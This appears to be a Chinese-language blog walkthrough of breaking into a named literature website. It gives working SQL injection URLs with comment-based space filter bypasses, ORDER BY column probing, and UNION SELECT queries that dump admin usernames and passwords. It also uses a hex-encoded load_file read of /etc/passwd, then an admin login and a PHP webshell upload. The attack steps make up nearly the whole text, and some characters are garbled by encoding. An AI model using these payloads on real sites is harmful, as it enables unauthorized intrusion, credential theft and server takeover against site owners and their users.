縱橫時空文學(xué)站地址為http://xxx.ouou.com/，是ouou網(wǎng)站下屬的一個文學(xué)小說的網(wǎng)站。 界面做的非常漂亮. 初步看了下為PHP MYSQL的架構(gòu)PHP版本為PHP/5.1.4-0.1. 。WEBSERVER使用的是Apache/2.0.55 基于以上幾點應(yīng)該大概能判斷出服務(wù)器應(yīng)該是使用的UNIX . 這種架構(gòu)應(yīng)該為典型的P M U的架構(gòu)了 也就是PHP MYSQL UNIX 。 可能有讀者會問了 ？ 你怎么知道他的Apache跟MYSQL的版本呢？ 其實這個很簡單。 在WEB隨便輸入一個不存在的頁面 看下暴錯信息就OK了。 如圖1



看到圖1我們了解了網(wǎng)站的大概情況 首先就來查找注射漏洞。 隨便打開一個帶有參數(shù)的連接 地址為http://xzx.ouou.com/newslook.php?id=29 輸入一個單引號檢測， 成功返回錯誤信息， 并且暴出了WEB絕對路徑，如圖2



錯誤信息如下:

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /data/webroot/zh/newslook.php on line 264

通過錯誤信息得知WEB路徑為/data/webroot/zh/newslook.php通過路徑可以肯定服務(wù)器為UNIX

繼續(xù)使用and 1=1 1=2來判斷是不是真的存在注射漏洞

http://xx.ouou.com/newslook.php?id=29【/**/and/**/1=1】/**/and/**/1=1 作用與我們在ASP注射中的 and 1=1的效果是一樣的，因為有些站會過濾■空格，/**/是替代空格的。返回正常

繼續(xù)http://xx.ouou.com/newslook.php?id=29【/**/and/**/1=2】

返回錯誤， 現(xiàn)在可以肯定http://xx.ouou.com/newslook.php?id=29 這個地址存在注射漏洞。

既然存在漏洞，我們就來通過注射點來查找到管理員的密碼從而登陸后臺來取得WEBSHELL。 現(xiàn)在來爆一下他的有多少個字段。

使用/**/order/**/by/**/10 來判斷他的字段是不是小于10

http://XX.ouou.com/newslook.php?id=29【/**/order/**/by/**/10】 如圖3



如圖得知我們執(zhí)行/**/order/**/by/**/10 頁面返回錯誤 說明字段是小于10的 我們繼續(xù)執(zhí)行

http://ouou.com/newslook.php?id=29【/**/order/**/by/**/9】

http://ouou.com/newslook.php?id=29【/**/order/**/by/**/8】

http://ouou.com/newslook.php?id=29【/**/order/**/by/**/7】

http://ouou.com/newslook.php?id=29【/**/order/**/by/**/6】

http://.ouou.com/newslook.php?id=29【/**/order/**/by/**/5】

http://ouou.com/newslook.php?id=29【/**/order/**/by/**/4】

直到執(zhí)行/**/order/**/by/**/4的時候頁面返回正常 如圖4



我們看到當(dāng)執(zhí)行/**/order/**/by/**/4到4的時候返回正常說明存在4個字段。 因為我們在前面已經(jīng)得到MYSQL的版本 所以已經(jīng)不用判斷就知道是支持union聯(lián)合查詢的、

繼續(xù)猜解密碼

http://xx.ouou.com/newslook.php?id=29/**/and/**/1=2/**/union/**/select/**/1,2,3,4

返回出幾個數(shù)字，一會帳號密碼會從顯示出來 ：)

我們來爆字段名，經(jīng)過一段時間的猜解最終確定表為admin

http://xx.ouou.com/newslook.php?id=29/**/and/**/1=2/**/union/**/select/**/1,2,3,4/**/from/**/admin 如圖5


因為返回正常說明存在該表，返回錯誤則不存在。 經(jīng)過半天的猜解解，確定列名為“pas”“us”“id”，把相應(yīng)的列名對應(yīng)上面的相應(yīng)的數(shù)字，數(shù)字部分就會出現(xiàn)我們想要的的東西了。語句是這樣的，上面顯示的數(shù)字為2、3我們這里替換2、3為“pas”和“us”
id=29/**/and/**/1=2/**/union/**/select/**/1,pas,us,4/**/from/**/admin，這樣在2、3部分就會出現(xiàn)帳號和密碼了。

另外PHP注射如果在權(quán)限夠的情況下是可以讀到目標(biāo)網(wǎng)站的的源文件，可以去讀一些類似CONN的文件取得敏感信息?，F(xiàn)在來判斷下這個注射點有沒有權(quán)限讀文件

http://.ouou.com/newslook.php?id=29【/**/and/**/(select/**/count(*)/**/from/**/mysql.user)>0 /*】如圖6



返回正常說明有權(quán)限讀文件，現(xiàn)在可以調(diào)用load_file的函數(shù)來讀文件了，還記剛才【’】爆出的絕對路徑吧。直接讀就可以了，不過要把路徑轉(zhuǎn)換成hex編碼，為什么呢？因為某些字符在url會被轉(zhuǎn)意比如\會被轉(zhuǎn)意成/，既然試UNIX主機嘗試讀一下/etc/passwd 繼續(xù)http://XX.ouou.com/newslook.php?id=29【/**/and/**/1=2/**/union/**/select/**/1,2,load_file(0x2F6574632F706173737764),4】

load_file(0x2F6574632F706173737764)替換3的位置，如果可以讀3的位置會出現(xiàn)文件內(nèi)容，如圖7



看到了吧，可以讀出來：）?！?x2F6574632F706173737764】是/etc/passwd的hex編碼，接下來就是要去網(wǎng)站源文件然后去頂部找調(diào)用數(shù)據(jù)庫的文件然后再讀數(shù)據(jù)庫文件找到mysql密碼，這個我就不說了，因為我已經(jīng)得到了 admin的密碼 并且知道后臺為http://XXouou.com/admin 直接登陸后臺先拿個WEBSHELL再說 如圖8



登陸后臺發(fā)現(xiàn)權(quán)限非常大，可以直接看到跟目錄的文件，并且我們看到“重命名”“編輯”“刪除”等字樣。 但是這里并不可以利用，因為一編輯就會提示你輸入另一個密碼。 另外我發(fā)現(xiàn)網(wǎng)站后臺使用了FCKeditor編輯器。并且可以成功上傳一個asa的文件。但是我們知道apache 是不解吸ASP文件的。所以就沒有辦法，只能尋找可以上傳PHP的地方。

記的剛登陸后臺后臺的時候看到跟目錄那里有個上傳目錄，嘗試上傳一個PHP發(fā)現(xiàn)提示更新成功，馬上訪問發(fā)現(xiàn)存在那個PHP文件。如圖9





圖10

至此我們已經(jīng)成功的拿到了WEBSHELL 并且也找到了MYSQL密碼。 發(fā)現(xiàn)WEBSHELL的權(quán)限非常大，至于提權(quán)就不需要了。馬上通知朋友修補漏洞咯。

最新評論